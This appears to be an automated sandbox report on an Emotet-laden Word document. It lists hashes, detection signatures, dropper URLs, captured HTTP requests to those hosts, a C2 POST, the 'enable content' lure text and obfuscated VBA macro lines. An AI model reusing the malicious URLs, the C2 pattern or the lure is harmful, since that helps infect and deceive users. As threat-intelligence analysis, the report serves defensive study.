Analysis Report MAIL-0573188.doc

Overview

General Information

Sample Name: MAIL-0573188.doc
Analysis ID: 337092
MD5: 7ad5e41d03b2dfe72af417fa5b0cc164
SHA1: 2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256: 2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://veterinariadrpopui.com Avira URL Cloud: Label: malware
Source: http://veterinariadrpopui.com/content/5f18Q/ Avira URL Cloud: Label: malware
Source: http://sofsuite.com/wp-includes/2jm3nIk/ Avira URL Cloud: Label: phishing
Source: http://khanhhoahomnay.net/wordpress/CGMC/ Avira URL Cloud: Label: malware
Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/ Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/ Avira URL Cloud: Label: malware
Source: http://wpsapk.com/wp-admin/v/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: veterinariadrpopui.com Virustotal: Detection: 7%
Source: khanhhoahomnay.net Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: MAIL-0573188.doc Virustotal: Detection: 66%
Source: MAIL-0573188.doc Metadefender: Detection: 47%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree, 7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree, 7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F75AE CryptDecodeObjectEx, 13_2_001F75AE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F109C FindFirstFileW, 13_2_001F109C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wpsapk.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 45.130.229.91:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.141.14:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1 Host: wpsapk.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1 Host: sofsuite.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1 Host: veterinariadrpopui.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/n/ HTTP/1.1 Host: shop.elemenslide.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1 Host: khanhhoahomnay.net Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 209.59.139.39
Source: Joe Sandbox View IP Address: 45.130.229.91
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LIQUIDWEBUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AS-HOSTINGERLT
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1 DNT: 0 Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWz User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 5.2.136.90 Content-Length: 8068 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0020023A InternetReadFile, 13_2_0020023A
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: wpsapk.com
Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp String found in binary or memory: http://beatlemail.net/picture.php?blogid=0
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2109649059.000000001B86F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaneH)
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp String found in binary or memory: https://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp String found in binary or memory: https://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp String found in binary or memory: https://shop.elemenslide.comp
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443

E-Banking Fraud:

Yara detected Emotet

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains an embedded VBA macro with suspicious strings
Source: MAIL-0573188.doc OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: MAIL-0573188.doc OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: MAIL-0573188.doc OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
Source: MAIL-0573188.doc OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: MAIL-0573188.doc OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: MAIL-0573188.doc OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: MAIL-0573188.doc OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
Source: MAIL-0573188.doc OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: MAIL-0573188.doc OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: MAIL-0573188.doc OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: MAIL-0573188.doc OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: MAIL-0573188.doc OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: MAIL-0573188.doc OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: MAIL-0573188.doc OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: MAIL-0573188.doc OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: MAIL-0573188.doc OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: MAIL-0573188.doc OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: MAIL-0573188.doc OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs") Name: Hrs2a1p95u19
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD") Name: Hrs2a1p95u19
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
